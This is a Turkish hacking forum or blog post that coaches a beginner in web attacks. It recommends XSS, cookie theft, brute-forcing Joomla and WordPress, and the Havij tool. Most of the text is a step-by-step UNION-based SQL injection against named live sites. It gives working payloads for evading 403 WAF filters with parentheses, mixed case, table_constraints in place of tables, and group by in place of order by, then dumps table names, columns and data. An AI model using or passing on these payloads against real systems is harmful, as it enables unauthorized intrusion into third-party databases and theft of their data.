Ve Aleykum Salam. Hos Geldin.. Iyi Forumlar Dilerim. Gelelim Nasil
Baslaya bilirsin bu Web Hack olayina. Tam iyi 1 Hacker olmak icin 3
farkli dili bilmen gerekir. Aslinda Simdiki devr-de 1 Site Hacklarsan
kendi kendine Hacker diyorsundur. Gelelim kicik aciklara. Mesala anket
acigi onlar cok yeni baslayanlar icin. Sen ise Yeni Basladin ve
soyledigin gibi PHP / HTML / ASP -ni 1-1inden ayird ede biliyorsun. En
iyi yontemler Persistent / Dom XSS aciklari. Cookie calma en iyi
yontemlerden 1-idir. Joomla Brute Wordpress Brute gibi yollarda olur. Ve
Modern Web hack Yolu "SQL" Yani "Structured Query Language" Turkce
Yapilandirilmis Sorgu dili. Ve Havij adli 1 program var onunla bu SQL
aciklardan kullanarak yararlana bilirsin. Yadaki en guvenli safe yol ise
Manual Gitmekdir. Iste arada 1 Problemler cikar orasi sorun deyil.
Mesela Sana 1 trick oyrediyim. Belkide biliyorsundur.Sitede SQL -de
order by cekdikde 403 Forbidden hatasi cikiyor. Bazi sitelerde oyle.
Bazilarinda 406 not Acceptable cikiyo onu WAF ile kecersin amma zorlusu
403-dur ve Bypass edilmesi pek o kadarda zor deyildir. Mesala Sitemiz :
Kod:
http://construction.am/article.php?id=210
Errorumuzu Aldik kolumn sayimizi bulduk 12
Kod:
http://construction.am/article.php?id=-210+union+select+1,2,3,4,5,6,7,8,9,10,11,1
Ve bu zamanda bize 1 403 forbidden verir. Biz bunu nasil atlarik ve bypass ederik? Anlatigim :
Kod:
union+select+1,2,3,4,5,6,7,8,9,10,11,12
Yerine Boyle yazarsan :
Kod:
union+(select+1,2,3,4,5,6,7,8,9,10,11,12)--
Ve ya
Kod:
uNioN+(sElEcT+1,2,3,4,5,6,7,8,9,10,11,12)--
Gibi yapa biliriz Altdada site uzerinde :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,8,9,10,11,12)--
Ve gordukki 403 Forbidden gitti 8 coulumn sayimizi aldik.
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,version(),9,10,11,12)--
Version : 5.5.19-55
Simdi table ve column adlarini cekelim :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12+from+information_schema.tables)--
Ve 403 forbidden verdi. Bunun anlami kodumuzda filtre var.
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,table_name,9,10,11,12+from+information_schema.tables)--
Yine 403 Forbidden. Bunun anlami "tables" sozumuzde filtre var
bunun yerine biz "table_constraints" yaza biliriz aynen "order+by" /
"group+by" gibi.Ve group_concat calismadigi icin bizde limitle cekicez.
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,table_name,9,10,11,12+from+information_schema.table_constraints+limit+0,1)--
Burda 0,1-de 0-i artiricaz taki aradigimiz tableleri buluncaya kadar. Ve Simdide column-larda boyle olucak :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,column_name,9,10,11,12+from+information_schema.columns+where+table_name=0xTableHexlenmiwFormada+limit+0,1)--
Data cekerken ise :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,columnadı,9,10,11,12+from+tableadı+limit+0,1)--
Ve bu kadar. Simdide gelelim 1 seye ilk kez denediyinizde order+by
cekdiyinizde 403 forbidden verirse o zaman siz gorup+by deneyin
Kod:
http://www.veikot.lv/index.php?id=10+order+by+1 - 403 ERROR
Kod:
http://www.veikot.lv/index.php?id=10+group+by+1 - Dogru Sayfa
Ve boyleliklede Bypass etmis oluruz. Ve Soyledigim gibi en iyisi
HTML / PHP / MySQL oyren PHP-de cok kolay $deyer filan onlari oyrenirsen
cok iyi olur cok sey bilirsin Neyin nasil ve narda olacagini. Acik
nerde? Neden acaba? Yeni Vuln-lar bulub Fix-leye bilirsin. Basarilar.
Greet'Z To : BOT_25
&& Respect! :D Avatar Fearless! ^_^
Hiç yorum yok:
Yorum Gönder